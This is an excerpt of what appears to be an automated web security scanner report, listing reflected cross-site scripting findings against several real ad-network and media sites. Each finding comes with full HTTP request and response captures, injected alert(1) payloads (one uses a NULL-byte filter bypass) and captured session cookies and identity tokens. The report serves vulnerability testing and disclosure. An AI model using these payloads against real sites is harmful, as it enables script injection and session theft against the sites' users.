%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bp%3D6%3Bf%3D1067550%3Bh%3D1067546%3Bk=http://atl.whitepages.com/adclick/CID=0000e376b2c762f700000000/relocate=44b4e';alert(1)//c10e308a487http://svtrk.com/vtrk/?id=n5uteh2&utm_source=WP&utm_medium=CPM&utm_term=t10&utm_content=728x90&utm_campaign=ROS" TARGET="_blank" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage(\'Image1\',\'
...[SNIP]...

5.185. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ec49'-alert(1)-'d75dcf13764 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fm.js?8ec49'-alert(1)-'d75dcf13764=1 HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; FFcat=1394,2,14:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7; ZFFAbh=749B826,20|1483_759#365; FFad=0:3:0:0:1:0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 941
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1394,2,14:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe5-82a5-4989a5927aac0"
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=420
Expires: Sun, 30 Jan 2011 02:15:07 GMT
Date: Sun, 30 Jan 2011 02:08:07 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/d3;referrer='+document.referrer+';tag=d7.zedo.com/bar/v16-401/d3/jsc/fm.js;qs=8ec49'-alert(1)-'d75dcf13764=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.random();}

if(
...[SNIP]...

5.186. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d122"%3balert(1)//d7d071229a8 was submitted in the q parameter. This input was echoed as 7d122";alert(1)//d7d071229a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=1394&r=13&d=14&q=7d122"%3balert(1)//d7d071229a8&$=&s=2&l=http%3A//atl.whitepages.com/adclick/CID%3D0000e376b2c762f700000000/relocate%3D&z=0.718691564630717 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; ZCBC=1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFad=3:0:0:1:0:0; FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1394,2,14:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=139
Expires: Sun, 30 Jan 2011 01:46:01 GMT
Date: Sun, 30 Jan 2011 01:43:42 GMT
Connection: close
Content-Length: 3401

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='7d122";alert(1)//d7d071229a8';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=7d122";alert(1)//d7d071229a8;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                   var zzStr = "s=2;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=" + Math
...[SNIP]...

5.187. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f156'%3balert(1)//bd15349bb1d was submitted in the q parameter. This input was echoed as 6f156';alert(1)//bd15349bb1d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=1394&r=13&d=14&q=6f156'%3balert(1)//bd15349bb1d&$=&s=2&l=http%3A//atl.whitepages.com/adclick/CID%3D0000e376b2c762f700000000/relocate%3D&z=0.718691564630717 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; ZCBC=1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFad=3:0:0:1:0:0; FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1394,2,14:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=139
Expires: Sun, 30 Jan 2011 01:46:01 GMT
Date: Sun, 30 Jan 2011 01:43:42 GMT
Connection: close
Content-Length: 3401

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='6f156';alert(1)//bd15349bb1d';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=6f156';alert(1)//bd15349bb1d;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

5.188. http://digg.com/search [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /search

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %008c368"><script>alert(1)</script>5d52155c97c was submitted in the REST URL parameter 1. This input was echoed as 8c368"><script>alert(1)</script>5d52155c97c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /search%008c368"><script>alert(1)</script>5d52155c97c HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163912321857224960%3A171; expires=Mon, 31-Jan-2011 01:22:01 GMT; path=/; domain=digg.com
Set-Cookie: d=f593f891442b6b6080b2b72090490e4e14224dcee90063fea3ae0b428929449e; expires=Fri, 29-Jan-2021 11:29:41 GMT; path=/; domain=.digg.com
X-Digg-Time: D=275117 10.2.129.3
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 5813

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/search%008c368"><script>alert(1)</script>5d52155c97c.rss">
...[SNIP]...

5.189. http://dm.de.mookie1.com/2/B3DM/2010DM/1860849269@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1860849269@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b270"><script>alert(1)</script>1a31a3f7248 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM8b270"><script>alert(1)</script>1a31a3f7248/2010DM/1860849269@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; session=1296350849|1296350983

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:45:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM8b270"><script>alert(1)</script>1a31a3f7248/2010DM/1010174904/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

5.190. http://dm.de.mookie1.com/2/B3DM/2010DM/1860849269@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1860849269@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3306c"><script>alert(1)</script>4eac73ea4c6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM3306c"><script>alert(1)</script>4eac73ea4c6/1860849269@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; session=1296350849|1296350983

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:45:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM3306c"><script>alert(1)</script>4eac73ea4c6/1471343948/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

5.191. http://dm.de.mookie1.com/2/B3DM/2010DM/1860849269@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1860849269@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13dba"><script>alert(1)</script>b9c1e9ca4ed was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1860849269@x2313dba"><script>alert(1)</script>b9c1e9ca4ed?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; session=1296350849|1296350983

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:46:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/185326303/x2313dba"><script>alert(1)</script>b9c1e9ca4ed/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

5.192. http://engine2.adzerk.net/z/8277/adzerk1_2_4_43,adzerk2_2_17_45 [keywords parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://engine2.adzerk.net
Path:   /z/8277/adzerk1_2_4_43,adzerk2_2_17_45

Issue detail

The value of the keywords request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69611'-alert(1)-'c3bf7d1437a was submitted in the keywords parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /z/8277/adzerk1_2_4_43,adzerk2_2_17_45?keywords=php,facebook,iframe,facebook-like69611'-alert(1)-'c3bf7d1437a HTTP/1.1
Host: engine2.adzerk.net
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: StackOverflow=9ca49ffc9f664387a222c78c37b5b08e

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sun, 30 Jan 2011 15:14:53 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: StackOverflow=9ca49ffc9f664387a222c78c37b5b08e; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 2022
Connection: keep-alive

function cssLoad(css){var s=document.createElement('style');document.getElementsByTagName('head')[0].appendChild(s);if(!!window.ActiveXObject){document.styleSheets[document.styleSheets.length-1].cssTe
...[SNIP]...
<a href="http://engine.adzerk.net/redirect/0/2564/2444/8277/a03a4092904040e18e901a243e653d5f/43/1178/2288/634319972937586141?keywords=php%2cfacebook%2ciframe%2cfacebook-like69611'-alert(1)-'c3bf7d1437a" rel="nofollow" target="_blank" title="">
...[SNIP]...

5.193. http://helenaspopkin.newsvine.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://helenaspopkin.newsvine.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5470"-alert(1)-"2158d48b318 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?e5470"-alert(1)-"2158d48b318=1 HTTP/1.1
Host: helenaspopkin.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:53:12 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=f02f9cb34b8692be67ae217ef748e81a; expires=Sat, 25-Jan-2031 17:53:12 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 92187

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
currentCommentBox = commentId;var renderedCommentBox = renderCommentBox ("http://www.newsvine.com/_action","http://www.polls.newsvine.com/_vine/images/_/","1465752","http://helenaspopkin.newsvine.com/?e5470"-alert(1)-"2158d48b318=1", 0,commentId, "", "", groupId, friendListId, threadId, privateLabel, "01", -1);getElement("dynamicCommentBox_"+commentId).innerHTML = renderedCommentBox;placeSpellChecker ("commentsTextDiv_"+commen
...[SNIP]...

5.194. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://i4.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c8a70<img%20src%3da%20onerror%3dalert(1)>1469ac780f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c8a70<img src=a onerror=alert(1)>1469ac780f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?appid=1000&scopeid=1&boxId=searchBox&btnId=submitSearch&watermark=Search%20all%20projects&overrideWatermark=true&searchLocation=%2fsite%2fsearch&allowEmptySearch=true&focusOnInit=True&minimumTermLength=3&c8a70<img%20src%3da%20onerror%3dalert(1)>1469ac780f8=1 HTTP/1.1
Host: i4.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://silverlight.codeplex.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_NVR_RU=0=technet:1=:2=; MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/12/2011 02:50:01&Microsoft.VisitStartDate=01/12/2011 02:50:01&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=NbkBuOI4W7cBv1mnAHhVbMOQZR4pSFpAnK7y46YYoMuoTqVfvpOJDTYUAUbtS2cNI8BvaR+SCC23nZMTeytyi7wNmiKQoC0huKoVOxO9PG4349NCx7DVlNmV/I4bkLVsQPDWI9Bsqfw4CAigE1dAh1BYCtKZo9uqxkgiGwXq+e0k2CWQBMJydEvQvf+a8Nmy0lBvBx9sMp029vD2knhH9q3cjQbZxn3d/T9SCIAmvvv/s2I5E7D3U2bYKmXA8D2pYaGjWhFIkGPPBwVNdZM0gBNghumGYE3ytU+ILnGMVeSvePI6D6PqDJrflWnDWzImxN5OE1evuVhNxF+HLtGrIkyVXonl+BTy57QP6nzOR8xDTgEwSjCHY8/Bk9JyRwZg7yIiU4jUEbrdJT2XMDr4AswK4Wiy1TGrclwPTNsTA9c0XB9nYdOMBy66L0gCAgZ5Xl2KxwR+ak8o2EGeRwJddAgw92owb1NRPjd/6vkOYqly9qWJu5Yj/8uUccCK8nxtzsHYjQ2KgbbGdKcZOJMx5arSS+8FsBl+/Opeqt5VTOk=&Microsoft.MicrosoftId=0237-9950-5424-5770; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1294837831501:ss=1294837831501; omniID=1294458843112_6a73_9555_4be9_86ce555049db; msdn=L=1033; 